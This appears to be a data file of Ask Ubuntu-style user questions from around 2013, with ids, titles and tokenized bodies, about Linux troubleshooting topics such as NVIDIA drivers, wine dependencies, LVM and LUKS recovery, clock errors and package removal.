347745	ubuntu 12.04 does n't detect nvida geforce 710 driver on a samsung laptop	i just recently installed ubuntu 12.04 on my samsung laptop but noticed it keeps crashing every time i tweak it . when i checked system settings , it says my graphics card driver is `` unknown '' . my graphics card is an nvida geforce 710 . i tried lspci -v and it gave me the info about my card : 01:00.0 3d controller : nvidia corporation gf117m [ geforce 610m/710m / gt 620m/625m/630m/720m ] ( rev a1 ) subsystem : samsung electronics co ltd geforce 710m flags : fast devsel , irq 16 memory at f0000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at 3000 [ size=128 ] expansion rom at < ignored > [ disabled ] capabilities : < access denied > kernel modules : nouveau , nvidiafb when i reboot , i noticed my laptop saying unknown chipset for nouveau . i checked additional drivers and it says no proprietary drivers are being used . please help . i do n't know how to make it work or if i just need to wait for an update , i do n't want to use any other os .
347746	mouse and keyboard work weirdly until switching the terminal	i 've seen similar questions , but they seem to be somewhat different from what i 'm experiencing . and the solutions do n't work . first , it begins right away . i log in and i usually i ca n't drag the teamviewer window that starts automatically . probably i have similar feeling : to me , it feels a bit like some invisible window was put over the whole screen , or some application `` captured '' the mouse and did n't release it , but thats only speculation ; - ) sometimes after pressing ctrl-alt-del it starts working for a while . also , i usually ca n't switch between tasks using keyboard ( alt-tab ) . but it all starts working after i switch the terminal : ctrl-alt-f1 , ctrl-alt-f7 . i 'm running ubuntu-13.04 , that i 've recently installed on two machines . on the other one everything 's fine . i 'm using logitech dinovo edge keyboard and mad catz r.a.t . 7 mouse . i 've tried reinstalling xserver-xorg-input-all , to no purpose .
347747	what is oversee turing v1.0.0 ?	system info : windows 7 64-bit virtualbox 4.2.18 ubuntu 12.04 guest apache 2 installed and running running head / http/1.0 on terminal returns server as oversee turing v1.0.0 why is the server identifying itself as oversee turing ? there does n't seem to be much information online except for web server stats sites . i was wondering if there is more background info on this .
347752	empathy is telling me i have a new im message but i ca n't find it	... and ca n't get the notification to go away : how do i find the message or clear the notification ? i 've looked at my list of contacts and none of them have a blinking icon . i 've closed empathy and the notification is still there when i open it . it 's kind of annoying .
347753	uploading ubuntu	i am a new user . i just went to the ubuntu site and followed the download steps . it instructed me to download to a cdr which i am doing . however , it has taken over 2 hours and has been stuck on writing disc for a long time . is this typical ? is there a way to get ubuntu on your computer without using a disc ?
347754	how do i run emacs from terminal ? this is my first time using ubuntu	need help getting emacs going to run program for cs i class edit i get an error message saying emacs can be found in the following packages : emacs23 , emacs23-nox , e3 , emacs23-lucid , jove and that i have to enable them .
347756	how to print document with page number	is it there easy way to add page number to printed document ? it can be treated like header or footer . for example . i got a pdf document without page number . can i ask the printer to add it when print it out ? thanks
347758	does ubuntu come with little cms color management system	does ubuntu come with the little cms libraries or do i have to install them myself . i am looking for a linux that does .
347759	trying to use symbolic link gives me `` command not found '' error	i created a symbolic link via ln -s pathname/folder/file.py whatever and i now have a bright blue link in my home directory with the symbolic link command name but when i try whatever hello_world , it 's giving me an error saying whatever : command not found . what i want to do works when i re-type out the pathname and file but the symbolic link seems to be doing nothing ... .which means i did something wrong
347768	is there a software alternative in ubuntu for ispy in windows ( multiple web cam recording software [ dvr ] ) ?	i use ispy in windows for recording multiple webcams and from multiple audio sources i.e , using the pc as a dvr . is there a software for ubuntu that can do that ? i need advanced features like motion detection and if possible number plate detection and face detection ( ispy has them ) . and also the feature of recording audio if it gets above a certain level .
347770	why there is no close animation for windows in gnome 3.8	recently i installed gnome ubuntu 13.04 on my xps 13 . everything works just fine instead there is no close windows animation like those in unity or kde . is that a problem of hardware compatibility ?
347778	how to install chart geany ?	i want to install 'chart geany ' . it 's available in 'software center ' , but instead of 'install ' option there is 'buy ' option ( it 's stated that software is free ) . can anyone recommend me 'command line ' installation method or any solution for the problem ?
347779	speakers and headphones at the same time when using a hp dv8t-1100	i am on a hp pavilion dv8t-1100 , running 64-bit ubuntu 13.04 . when i plug in my headphones the speakers and the headphones play sound at the same time . the speakers should stop playing and send all sound to the headphones . how can i configure the sound that when i connect my headphones the speakers in the laptop are muted and the sound only comes out to the headphones . i should mention that this model provides 2 audio output connections in the front ( not just one like most laptops ) . thanks !
347783	knowing how my ubuntu is installed	i recently installed ubuntu alongside windows 7 using a usb stick and universal ubuntu installer . i now want to know whether my disk has been partitioned , or whether ubuntu is installed within windows ... and also how i should uninstall ubuntu 13.04 if i want to . when i give the df-h command the following is the o/p filesystem size used avail use % mounted on /dev/sda6 7.2g 3.0g 3.9g 44 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 1.4g 4.0k 1.4g 1 % /dev tmpfs 287m 820k 286m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.4g 152k 1.4g 1 % /run/shm none 100m 48k 100m 1 % /run/user /dev/sda5 142g 1.8g 140g 2 % /media/zakirhussain/data /dev/sda2 122g 70g 53g 57 % /media/zakirhussain/os
347784	how do i disable the `` show cursor when ctrl is pressed '' option in 13.04 ?	i ca n't find it anywhere , and it 's interfering with my work . i tried it just for fun , but now i ca n't figure out how i turned it on ! please help . tweaks , code , or whatever . i need it disabled . thanks !
347788	how can i install libpcap header files on ubuntu 12.04 ?	how can i install libpcap header files on ubuntu 12.04 ? when i use apt-get install libpcap i receive following message : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libpcap
347791	how can i restore one file from my crashed bacula system	how can i restore one file from my crashed bacula system.i just want to restore one of the file that are in my bacula system that crashed .
347794	which unity lenses are available with ubuntu 13.04 ?	which unity lenses are available with ubuntu 13.04 for google search , google drive , google docs , wikipedia , social networking , cooking , torrent websites and how to install them ?
347798	wine not installing on freshly new ubuntu	after entering : sudo add-apt-repository ppa : ubuntu-wine/ppa sudo apt-get update sudo apt-get install wine1.7 sudo apt-get install winetricks in a terminal ; while installing wine i get : wine1.7 : depends : wine1.7-i386 ( = 1.7.2-0ubuntu1~ppa1 ) but it is not installable recommends : fonts-droid but it is not going to be installed recommends : ttf-mscorefonts-installer but it is not going to be installed recommends : fonts-horai-umefont but it is not going to be installed recommends : fonts-unfonts-core but it is not going to be installed recommends : winbind but it is not going to be installed e : unable to correct problems , you have held broken packages . when trying to install wine using the software center , i get : the following packages have unmet dependencies : wine1.4 : predepends : dpkg ( > = 1.15.7.2~ ) but 1.16.7ubuntu6 is to be installed depends : libc6 ( > = 2.14 ) but 2.15-0ubuntu20.1 is to be installed depends : wine1.4-amd64 ( = 1.4.1-0ubuntu1 ) but 1.4.1-0ubuntu1 is to be installed depends : wine1.4-i386 ( = 1.4.1-0ubuntu1 ) but it is not going to be installed i 've tried everything i can think of . removing wine completely ( with synaptic ) updating and upgrading ( resulting in 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded ) and auto-removing broken packages , tried forcefully installing it ( sudo apt-get dist-upgrade ) , etc. , everything . nothing works .
347799	suspends from kde , wakes in unity ?	i am running ubuntu 12.04lts 64bit . i prefer kde so i installed it a few weeks ago but several times i have woken my laptop to find it is back in unity . sometimes it is a mixture of the two as odd as that may sound . i mean , i have had the kde 4 task bar at the bottom with the menu as normal but with the unity wallpaper and icons . although i have played with linux on and off for years and am still very much a novice . any help greatly appreciated . thanks richard
347802	problem starting some apps	i have ubuntu 12.04 , fully updated it works good but some installed apps do n't work , like 4shared and opera13 where is the problem ?
347803	python module can be found using shell but not in virtualenv	when i do import numpy on my shell , numpy is found ( i can use it ) . however , when i workon my virtualenv import numpy gives me no module named numpy error . i tried to pip install numpy while working on my virtualenv but i get a could not create '/usr/lib/python2.7/site-packages ' error . i tried with sudo and it says that requirement already satisfied . why ?
347807	ubuntu not getting installed	i downloaded ubuntu 12.04 lts 64bit version . laptop already has windows 7 and installed along side windows 7 . after installation , it is not showing up in boot menu . instead it is directly booting to windows 7 . laptop supports 64 bit . i did the same thing in my pc , but it worked fine . also after installation , in windows 7 , the ext4 partition does n't show up . please help . thank you
347808	how to install a software in the particular directory ?	how to install a software into a particular directory using dpkg
347811	ubuntu ca n't processes key release	whenever i press fn+f8 to raise the volume or fn+f7 to lower the volume , ubuntu acts like the keys are being held down . the notification blinks rapidly as if i 'm hitting fn+f8/7 really fast . the trigger for the press down is being registered but not the release . my laptop is a samsung np350v5c-to1us i 'm using elementary os currently , but still have ubuntu 13.04 the problem persists through both its the exact same problem as : fn volume keys stick down fn key sticks down getting function keys working on samsung rv510 notebook this gives a possible solution : getting function keys working on samsung rv510 notebook but i have no idea how to do it even with his instructions . it basically trying to get ubuntu to force release the problematic keys .
347813	copying a lot of files failed by using smb : \\serverip in nautils	copying a lot of files failed by using smb : \serverip in nautils i was copying a lot of photos from windows server to my ubuntu desktop . at beginning , it looked ok . but nautils progress bar stop updating after a while and the copying suspend . seems like it 's not reliable to use nautils samba . i was using ubuntu desktop 13.10 desktop 64 bit . copying folder from windows server 2008 r2 . in the folder , there are over 11,000 photos . the progress stuck around 3000 photos , and the photo size is around 5-6kb . any workaround should i do ?
347817	lvreduce too much . can i recover this ?	i was trying to take a hard drive out of a large lvm group consisting of 5 drives . it had a 5.5tb filesystem ( ext4 ) . the lv was 7.5tb . i wanted to reduce the lv by 1.82tib so that i then could shrink the vg and pvmove the drive off the group . i did the following : fsck -f ( passed ) lvreduce -l 1.82t /dev/mapper/my_storage_vg-storage_lv this produces the warning : rounding up size to full physical extent 1.82 tib warning : reducing active logical volume to 1.82 tib this may destroy your data ( filesystem etc . ) do you really want to reduce storage_lv ? [ y/n ] : which is what i expected , so i said yes , assuming i had the space to give . however , you may have noticed i forgot the minus sign on the 1.82t , so instead of reducing it by 1.82t , i instead reduced it to 1.82t ! ! my next command was an fsck , which failed and i said no to any repairs , immediately seeing the error . the next command i tried was : lvextend -l +100 % free /dev/mapper/my_storage_vg-storage_lv this restored the size of the lv . i then tried fsck- f but this time the fsck failed once it got to block bitmap differences . i suspect the lvextend command put the blocks back in , in a different order then they were in when they were removed , essentially scrambling the filesystem . does this sound correct , and if so what can i do to unscramble the ext4 file system ? anything at all ? all help greatly appreciated ... addendum : i did a pvscan at an earlier point in the process : pv /dev/sdf1 vg my_storage_vg lvm2 [ 1.82 tib / 0 free ] pv /dev/sda1 vg my_storage_vg lvm2 [ 1.82 tib / 0 free ] pv /dev/sde1 vg my_storage_vg lvm2 [ 1.82 tib / 0 free ] pv /dev/sdc1 vg my_storage_vg lvm2 [ 1.36 tib / 0 free ] pv /dev/sdd1 vg my_storage_vg lvm2 [ 698.63 gib / 698.63 gib free ] i suspect this is the order that the drives were added to the vg originally ( maybe , not sure ) . i am considering taking the lv and vg down to 0 size , then adding in the drives one at a time vgextend /dev/sda1 lvextend sda1 vg extend sde1 lvextend sde1 etc ... is there a better way to do this ? better yet : lvreduce -l 0 /dev/mapper/my_storage_vg-storage_lv lvextend /dev/mapper/my_storage_vg-storage_lv /dev/sdf1 lvextend /dev/mapper/my_storage_vg-storage_lv /dev/sda1 lvextend /dev/mapper/my_storage_vg-storage_lv /dev/sde1 lvextend /dev/mapper/my_storage_vg-storage_lv /dev/sdc1 fsck -f /dev/mapper/my_storage_vg-storage_lv
347818	what is the default root password when was never set at installation time ?	on a standard desktop installation , i created my administrative and user login . further with some applications , the system ask for the root password . so my question is : what will be the default password for the root login when i never created it during the installation process ?
347821	gedit runs with unsaved empty document	in the last few days gedit has started behaving quite weird . every time i open it , it has an unsaved , empty document , even if i open some code file ( so as a result , instead of opening my file file.txt i also have a tab with unsaved , empty file ) . the error only occurs when i use the gedit from the kde ( i am usingkubuntu ) by either double clicking the file or by `` open with- > gedit '' command . opening from the command line works just fine . closing this extra tab obviously brings up the `` unsaved changes '' warning , and after closing - it appears again after opening file from the kde . has anyone experienced this behaviour and if so , is there a fix ? gedit -- version gedit - version 3.6.2 cat /etc/lsb-release distrib_id=ubuntu distrib_release=13.04 distrib_codename=raring distrib_description= '' ubuntu 13.04 ''
347826	ubuntu install on power mac g5 using firewire drive	just wondering if anyone could help me out . i installed ubuntu to an external firewire hd . it added a partition for the os and a partition for bootstrap . i can not for the life of me figure out how to get boot loader ( holding option key ) to see that there is a firewire drive with ubuntu on it . i have searched the subject all night , and i just ca n't figure it out . i thought maybe someone here could help that has done it on a ppc . i 'm new to ubuntu so step by step would be nice if anyone could help .
347827	no libre writer since 13.4 update	since i updated from 12.10 to 13.4 i have not been able to open libre writer , can anyone help ? i am a beginner but willing to try !
347829	when will native games come to ubuntu ?	real games that use powerful video cards .
347830	how can i get a 'verbose ' apt-get exit code ?	how can i get a 'verbose ' exit code for apt-get so that errors like this package google-chrome is a virtual package provided by : google-chrome-stable 29.0.1547.76-r223446 google-chrome-beta 30.0.1599.47-1 you should explicitly select one to install . e : package 'google-chrome ' has no installation candidate have a different exit code than download errors like this err http : //dl.google.com/linux/chrome/deb/ stable/main google-chrome-stable amd64 29.0.1547.76-r223446 something wicked happened resolving 'dl.google.com : http ' ( -11 - system error ) currently , both errors exit with 100 basically , i 'd like to have download errors exit with a different code than errors like the first . if possible , i 'd like each specific error to have a different exit code , but the above example is the minimum i need . how can i do this in a vanilla ubuntu install without additional software ( with the exception of aptitude ) ?
347832	adding an apt repository when using a web proxy	i have been trying to install wine on ubuntu 12.04 and i do n't seem to be winning . i keep getting this error : file `` /usr/bin/add-apt-repository '' , line 125 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 84 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 56 , 'received http code 407 from proxy after connect ' ) please , can someone assist ?
347836	installed ubuntu 12.04 64 bit on windows 8 and can not open windows 8	i am a new user of ubuntu . i bought a computer with windows 8 pre installed and in order to install ubuntu i followed the instructions of the following link ( i partitioned the disc and disabled secure boot ) : installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) when i chose from grub menu to start windows 8 , it did not boot . when i tried to repair with boot repair , i could not boot even with ubuntu . the boot repair had a message that i had to report if it did not work : http : /paste.ubuntu.com/6112385 . i reinstalled ubuntu but the problem is still the same : i can not boot into windows 8 . can someone point me on what to do next so as i can run windows 8 on my pc as well as ubuntu ?
347838	superblock set in the future , fixing system clock	i keep getting errors messages about my superblock mount time being in the future , and insisting on doing fsck on every boot and i have to go in from the recovery options to do this every time . here is information i think maybe helpful , i ran these after booting and fsck : snipped from dump2fs after fsck last mount time : thu sep 19 17:24:47 2013 last write time : thu sep 19 17:24:47 2013 mount count : 14 maximum mount count : -1 last checked : thu sep 19 14:31:17 2013 $ sudo hwclock -- debug hwclock from util-linux 2.20.1 using /dev interface to clock . last drift adjustment done at 1379654884 seconds after 1969 last calibration done at 1379654884 seconds after 1969 hardware clock is on local time assuming hardware clock is kept in local time . waiting for clock tick ... ... got clock tick time read from hardware clock : 2013/09/20 00:28:37 hw clock time : 2013/09/20 00:28:37 = 1379662117 seconds since 1969 fri sep 20 00:28:37 2013 -0.567722 seconds $ sudo dpkg-reconfigure tzdata current default time zone : 'america/los_angeles' local time is now : fri sep 20 00:32:33 pdt 2013 . universal time is now : fri sep 20 07:32:33 utc 2013 . $ date fri sep 20 00:32:20 pdt 2013 $ cat /proc/driver/rtc rtc_time : 00:32:03 rtc_date : 2013-09-20 alrm_time : 23:41:15 alrm_date : 2013-09-20 alarm_irq : no alrm_pending : no update irq enabled : no periodic irq enabled : no periodic irq frequency : 1024 max user irq frequency : 64 24hr : yes periodic_irq : no update_irq : no hpet_emulated : yes bcd : yes dst_enable : no periodic_freq : 1024 batt_status : okay $ cat /etc/adjtime 0.000000 1379654884 0.000000 1379654884 local i ran it a second time as soon as possible with one string : date & & hwclock -- debug & & dumpe2fs /dev/sdc3 | head -50 fri sep 20 22:06:11 pdt 2013 hwclock from util-linux 2.20.1 using /dev interface to clock . last drift adjustment done at 1379663788 seconds after 1969 last calibration done at 1379663788 seconds after 1969 hardware clock is on local time assuming hardware clock is kept in local time . waiting for clock tick ... ... got clock tick time read from hardware clock : 2013/09/20 22:06:12 hw clock time : 2013/09/20 22:06:12 = 1379739972 seconds since 1969 fri sep 20 22:06:12 2013 -0.844855 seconds dumpe2fs 1.42 ( 29-nov-2011 ) last mount time : fri sep 20 15:04:39 2013 last write time : fri sep 20 14:54:16 2013 mount count : 21 maximum mount count : -1 last checked : thu sep 19 14:31:17 2013
347841	icons are not displaying	i 've problem with xnretro and xnsketch icons . i copied xnretro and xnsketch folders to /opt via gksudo nautilus and then create launcher with sudo gnome-desktop-item-edit /usr/share/applications/ -- create-new name = xnsketch command = /opt/xnsketch/xnsketch.sh i 've select an icon from /opt/xnsketch/xnsketch.png program is working but icons are undefined in ubuntu 12.04 _ 32bit . my screen capture http : //s20.postimg.org/8fi6q556l/captura.png how can i fix this problem .
347842	problem with nividia drivers	i am running ubuntu 12.04 on a hp workstation z820 ( with nvidia nvs 510 2gb graphic card ) , i use a display port for the screen . the system works fine generally but if the screen is off for a while and i want to turn it on , then it goes black / gets disturbed some times . i also tried a dvi-d cable with a mini port adapter then resolution is too low . i guess some thing is wrong with graphic card drivers but do not know how to fix it . could any one help me with this issue ? i appreciate a lot ! /omid
347844	how do i resolve unmet dependencies related to mesa/wayland ?	on my ubuntu 13.04 machine , i used to have the updated and optimized open graphics drivers ppa enabled and with a recent update it required wayland as a dependency . this seems to have broken my package system . i disabled this ppa so when i try to upgrade , i get the following sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libegl1-mesa : depends : libwayland-client0 ( > = 1.2.1 ) but it is not installable depends : libwayland-server0 ( > = 1.2.1 ) but it is not installable recommends : libegl1-mesa-drivers but it is not installed libgail-3-0 : depends : libgtk-3-0 ( = 3.6.4-0ubuntu8+gd~r ) but 3.6.4-0ubuntu8 is installed libgbm1 : depends : libwayland-client0 ( > = 1.2.1 ) but it is not installable depends : libwayland-server0 ( > = 1.2.1 ) but it is not installable libgl1-mesa-dev : depends : libgl1-mesa-glx ( = 9.3~git1309181129.ec44d5~gd~r ) but 9.3~git1309171217.a1b6e6~gd~r is installed libgtk-3-0 : depends : libgtk-3-common ( = 3.6.4-0ubuntu8 ) but 3.6.4-0ubuntu8+gd~r is installed libgtk-3-bin : depends : libgtk-3-0 ( > = 3.6.4-0ubuntu8+gd~r ) but 3.6.4-0ubuntu8 is installed e : unmet dependencies . try using -f. i do not dare doing sudo apt-get -f install since this will remove a huge amount of packages , including unity , network-manager-gnome , etc . what should i do ? i tried installing synaptic ( and one of its dependencies , libgtk-3-0 ) from deb packages found on launchpad , but this failed also . i am ready to remove said ppa totally , using ppa-purge . when iâ try that , the solutions it presents always imply removing unity , which i do not want . here is the output of sudo apt-get check : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libegl1-mesa : depends : libwayland-client0 ( > = 1.2.1 ) but it is not installable depends : libwayland-server0 ( > = 1.2.1 ) but it is not installable recommends : libegl1-mesa-drivers but it is not installed libgail-3-0 : depends : libgtk-3-0 ( = 3.6.4-0ubuntu8+gd~r ) but 3.6.4-0ubuntu8 is installed libgbm1 : depends : libwayland-client0 ( > = 1.2.1 ) but it is not installable depends : libwayland-server0 ( > = 1.2.1 ) but it is not installable libgl1-mesa-dev : depends : libgl1-mesa-glx ( = 9.3~git1309181129.ec44d5~gd~r ) but 9.3~git1309171217.a1b6e6~gd~r is installed libgtk-3-0 : depends : libgtk-3-common ( = 3.6.4-0ubuntu8 ) but 3.6.4-0ubuntu8+gd~r is installed libgtk-3-bin : depends : libgtk-3-0 ( > = 3.6.4-0ubuntu8+gd~r ) but 3.6.4-0ubuntu8 is installed e : unmet dependencies . try using -f .
347845	how do i remove gnome from ubuntu 13.04 ?	i have installed ubuntu 13.04 with gnome . now i want to remove it completely and i want the classic ubuntu 13.04 .
347848	mount readable for everyone using udisks-glue	i 'm trying to setup automount solution for usb drives on ubuntu 12.04 server . i decided to use udisks with udisks-glue . unfortunately when i try to use option user for mounting it fails : udisks -- mount /dev/sdb1 -- mount-options user mount failed : mount option user is not allowed without the user option the directory is only readable by root . i also tried using umask=000 in the options , the dir permission change but still it 's empty for the normal user , i can read only while being root . the same problem happens when using udisks from command line as a regular user and from init scripts . only the owner of the directories created changes , but in both situations i ca n't read as a regular user . is it possible to mount using udisks to be readable for everyone ? best regards yemu
347854	how to count battery cycles ?	like most user that have searched about knows , manufacturers acpi implementation is a mess . and for most of our laptops , battery infos are unavailable or wrong ( on a dell inspiron 15z , the rate is divided by 10 ) . is there a way ( a perl/python/bash script , an existing package or whatever ) to log battery cycles on ubuntu 12.04 ? ( what is a battery cycle ? ) a charge cycle means using all of the batteryâs power , but that doesnât necessarily mean a single charge . for instance , you could listen to your [ device ] for a few hours one day , using half its power , and then recharge it fully . if you did the same thing the next day , it would count as one charge cycle , not two , so you may take several days to complete a cycle . each time you complete a charge cycle , it diminishes battery capacity slightly , but you can put [ device battery ] through many charge cycles before they will only hold 80 % of original battery capacity . apple courtesy my laptop is a clevo w150hrm , and when i do : cat /sys/class/power_supply/bat0/cycle_count i get : 0 my laptop is 2 years old . thank you by advance .
347856	mounting logical volume from .img containing a luks encrypted volume group	i 'm having some trouble restoring a back-up i made of a encrypted filesystem . the back-up is a .img file containing a single disc partition . this partition is a luks container in which a logical volume group 'vg-crypt ' resides . within this volume group i have two logical volumes , lv-crypt-root and lv-crypt-swap . in my new ubuntu install i proceed as following cryptsetup luksopen /media/lars/shd/disk.img backup pasword ... . and to check if the logical volumegroup is recognised i type : pvs which tells me : pv vg fmt attr psize pfree /dev/mapper/backup vgcrypt lvm2 a -- 151,11g 196,00m /dev/mapper/tphd vgtphd lvm2 a -- 151,11g 116,00m so far so good , my current root volume ( tphd or vgtphd ) is recognised as well as my backup vg ( backup or vgcrypt ) now lets check out the lv 's in the backup volume : lvdisplay /dev/vgcrypt ... -- - logical volume -- - lv path /dev/vgcrypt/lv-crypt-root lv name lv-crypt-root vg name vgcrypt lv uuid nc4vsk-icqb-l2s1-iyij-rsoj-vzqt-osgcn5 lv write access read/write lv creation host , time ubuntu , 2013-06-19 10:40:44 +0200 lv status suspended # open 0 lv size 147,12 gib current le 37663 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:5 -- - logical volume -- - lv path /dev/vgcrypt/lv-crypt-swap lv name lv-crypt-swap vg name vgcrypt lv uuid exeizv-ahcn-zg1q-nqj5-jsqe-nkyg-2rkyvb lv write access read/write lv creation host , time ubuntu , 2013-06-19 10:41:14 +0200 lv status suspended # open 0 lv size 3,80 gib current le 973 ... .. bla bla conclusion , lv is recognized . this is where the problems start , i try to mount the lv : mount /dev/vgcrypt/lv-crypt-root /mnt/lvm/ gives me mount : special device /dev/vgcrypt/lv-crypt-root does not exist when making sure it is active by : vgchange -ay /dev/vgcrypt i got this : device-mapper : resume ioctl on failed : invalid argument unable to resume vgcrypt-lv -- crypt -- root ( 252:5 ) device-mapper : resume ioctl on failed : invalid argument unable to resume vgcrypt-lv -- crypt -- swap ( 252:6 ) 2 logical volume ( s ) in volume group `` vgcrypt '' now active i got pretty much no idea what that means so i start googling and find that maybe i should export the inactivated vg with vgexport so : vgchange -an /dev/vgcrypt attempted to decrement suspended device counter below zero . attempted to decrement suspended device counter below zero . 0 logical volume ( s ) in volume group `` vgcrypt '' now active and vgexport vgcrypt volume group `` vgcrypt '' has active logical volumes seems pretty paradoxical to me . can anyone point me in the right direction ? any help would be greatly appreciated : ) p.s . just checked the syslog , seems relevant but does n't make much sense to me : ( filtered al the wifi info out : ) cat /var/log/syslog | grep kernel | grep -v wlan | grep -v cfg80211 | tail -n 40 | cut -f 5-90 -d `` `` kernel : [ 58297.025013 ] device-mapper : table : 252:8 : linear : dm-linear : device lookup failed kernel : [ 58297.025023 ] device-mapper : ioctl : error adding target to table kernel : [ 58297.026024 ] device-mapper : table : 252:8 : linear : dm-linear : device lookup failed kernel : [ 58297.026030 ] device-mapper : ioctl : error adding target to table kernel : [ 58297.026901 ] device-mapper : table : 252:8 : linear : dm-linear : device lookup failed kernel : [ 58297.026907 ] device-mapper : ioctl : error adding target to table kernel : [ 58297.077530 ] device-mapper : multipath : version 1.5.1 loaded kernel : [ 59654.867358 ] device-mapper : table : 252:5 : dm-7 too small for target : start=2048 , len=308535296 , dev_size=284453912 kernel : [ 59654.867994 ] device-mapper : table : 252:6 : dm-7 too small for target : start=308537344 , len=7970816 , dev_size=284453912 kernel : [ 59655.179856 ] device-mapper : table : 252:5 : dm-7 too small for target : start=2048 , len=308535296 , dev_size=284453912 kernel : [ 59655.180623 ] device-mapper : table : 252:6 : dm-7 too small for target : start=308537344 , len=7970816 , dev_size=284453912 kernel : [ 59776.851223 ] device-mapper : table : 252:5 : dm-7 too small for target : start=2048 , len=308535296 , dev_size=284453912 kernel : [ 59776.851860 ] device-mapper : table : 252:6 : dm-7 too small for target : start=308537344 , len=7970816 , dev_size=284453912 kernel : [ 59777.149049 ] device-mapper : table : 252:5 : dm-7 too small for target : start=2048 , len=308535296 , dev_size=284453912 kernel : [ 59777.149561 ] device-mapper : table : 252:6 : dm-7 too small for target : start=308537344 , len=7970816 , dev_size=284453912 kernel : [ 60837.153424 ] device-mapper : table : 252:5 : dm-7 too small for target : start=2048 , len=308535296 , dev_size=284453912 kernel : [ 60837.154789 ] device-mapper : table : 252:6 : dm-7 too small for target : start=308537344 , len=7970816 , dev_size=284453912 kernel : [ 61508.827915 ] device-mapper : table : 252:5 : dm-7 too small for target : start=2048 , len=308535296 , dev_size=284453912 kernel : [ 61508.831243 ] device-mapper : table : 252:6 : dm-7 too small for target : start=308537344 , len=7970816 , dev_size=284453912 kernel : [ 61514.020906 ] device-mapper : table : 252:5 : dm-7 too small for target : start=2048 , len=308535296 , dev_size=284453912 kernel : [ 61514.021532 ] device-mapper : table : 252:6 : dm-7 too small for target : start=308537344 , len=7970816 , dev_size=284453912 kernel : [ 61514.311394 ] device-mapper : table : 252:5 : dm-7 too small for target : start=2048 , len=308535296 , dev_size=284453912 kernel : [ 61514.311906 ] device-mapper : table : 252:6 : dm-7 too small for target : start=308537344 , len=7970816 , dev_size=284453912
347860	connection to localhost closed	i have setup a ubuntu server 12.04 on virtual box . i 've succesfully installed jailkit 2.0 . but my user `` carsten '' ca n't ssh to my server from the terminal . my screen : *john @ john-desktop : ~ $ ssh carsten @ localhost -p 2222 carsten @ localhost 's password : welcome to ubuntu 12.04.2 lts ( gnu/linux 3.5.0-23-generic x86_64 ) documentation : https : //help.ubuntu.com/ system information as of fri sep 20 11:00:56 cest 2013 system load : 0.0 processes : 103 usage of / : 20.5 % of 6.62gb users logged in : 1 memory usage : 10 % ip address for eth0 : 10.0.2.15 swap usage : 0 % ip address for eth1 : 172.16.1.1 graph this data and manage this system at https : //landscape.canonical.com/ last login : fri sep 20 10:56:48 2013 from 10.0.2.2 connection to localhost closed . *
347861	acer aspire v3 771g ubuntu 13.04	gooday , i have this acer and i have alot of boot problems ( i suspect windows 8 ) and now i want to try ubuntu but when i use an usb to `` try '' ubuntu after the boot i get a black screen . now ive read some of the forums and i found something about nomodeset i have not tried this as i dont know what this does exactly . now i have found this wiki entry https : //wiki.ubuntu.com/bumblebee , i am by far no programmer and always reading all those commands have always kept me of linux because im scared i will ! @ # $ things up . is there anyway i can go to nomodeset in the ubuntu `` trial '' and can i also include the bumblebee futures ( coding ? ) and in how many ways wil this affect my laptops perfomance ? reading the bumblebee entry its seems to be something about nvidia optimus and i dont reallt care much for the power saving , but will it affect any performance ? im not a heavy pc gamer but i like tho do some gaming and streaming and such also on a rather big tv in wich this laptop already has it flaws in some games not running properly on 65 '' if this does n't work or u advise me not to do this what else can i do to fix windows 8 or either some other linux version ? i thankyou in advance
347862	accessing network through/with active directory ( network authentication , printers , etc )	in my high school the network ( local network with printers and file server + internet access ) is using active directory for authentication . if i want to print/access the file servers with ubuntu i need to authenticate against the ad . guess i 'll use samba but how exactly do you do that ? many thanks : )
347864	sudo bash ca n't execute script	i try to run a shell script file but failed so far on ubuntu . in my terminal : anon @ anon-k53u : ~/desktop/ftl/data $ ls amd64 exe_icon.bmp ftl licenses resources x86 anon @ anon-k53u : ~/desktop/ftl/data $ sudo bash ./ftl.sh [ sudo ] password for anon : bash : ./ftl.sh : no such file or directory anon @ anon-k53u : ~/desktop/ftl/data $ sh ftl.sh sh : 0 : ca n't open ftl.sh anon @ anon-k53u : ~/desktop/ftl/data $
347866	should maas and juju get installed on one of my servers or on a client system ?	i 've been struggling with maas and juju slightly . i have two servers that i want to use as nodes , but i am unsure of where to install maas and juju . do they get installed on one of my two servers ? can they get installed on a client system like a laptop that is not always on / on the network ? do i need to get a very low power cheap system to run them on as my `` management '' system for my servers ? i hope someone can clear some of these things up for me a bit .
347870	ca n't mount iso disk file	i am kinda newbie in this so i need any help possible i try to rescue data from a failing 500gb hdd so i used safecopy command to create an iso file safecopy -- stage1 /dev/sdb1 /media/0b9b084718d4bcff/laptop2.iso after the safecopy process has been completed successfully i try to mount the iso file created using mount -o loop /media/0b9b084718d4bcff/laptop2.iso /mnt/disk and i get the following error message $ mftmirr does not match $ mft ( record 0 ) . failed to mount '/dev/loop0 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details .
347879	how do i un-install / remove a click package	i have installed some click packages on my ubuntu touch device . how do i remove them ?
